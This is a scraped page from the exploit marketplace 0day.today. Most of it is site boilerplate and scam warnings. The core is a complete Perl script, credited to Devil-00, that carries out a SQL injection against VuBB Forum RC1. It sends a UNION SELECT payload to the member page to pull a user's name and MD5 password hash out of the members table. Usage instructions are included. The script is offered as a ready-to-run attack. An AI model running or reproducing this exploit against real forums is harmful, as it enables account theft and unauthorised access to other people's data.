0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
VuBB Forum RC1 (m) Remote SQL Injection Exploit
=============================================== VuBB Forum RC1 (m) Remote SQL Injection Exploit =============================================== #!/bin/env perl #------------------------------------------------------------# #- VuBB RC1 SQL Injection .. By Devil-00 < devil-00@s4a.cc > #- [!] ==|| This Exploit Only When magic_quotes_gpc Is OFF ||== #- Gr33tz :- #- Abducter .. #- Devil-00 .. SQL Injection F0und3r & Expl0ting - | devil-00@s4a.cc | - #- Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P #------------------------------------------------------------# use LWP::Simple; print "\n\n==========================================\n"; print "\n= Exploit for VuBB RC1 "; print "\n= Coded By Devil-00 | devil-00@s4a.cc | "; print "\n= Gr33tz :- "; print "\n= Abducter .. "; print "\n= Devil-00 .. SQL Injection F0und3r & Expl0ting - | devil-00@s4a.cc | - "; print "\n= Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P "; print "\n============================================\n\n"; if(!$ARGV[0] or !$ARGV[1]) { print "\n==|| This Exploit Only When magic_quotes_gpc Is OFF ||=="; print "\nUsage:\nperl $0 [Full-Path] [User ID]\n\nExample:\nperl $0 http://vubb.com/forum/ 1\n"; exit(0); } $url = "/index.php?act=member&m=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,user,null,null,pass,null%20FROM%20members%20WHERE%20id=1/*"; $page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $ARGV[0]\n"; $page =~ m/Website: <a href='(.*?)'>(.*?)<\/a>/ && print "[+] User ID is: $1\n"; print "[-] Unable to retrieve User ID\n" if(!$1); $page =~ m/Yahoo: (.*?)<br \/>/ && print "[+] MD5 hash of password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1); # 0day.today [2024-11-16] #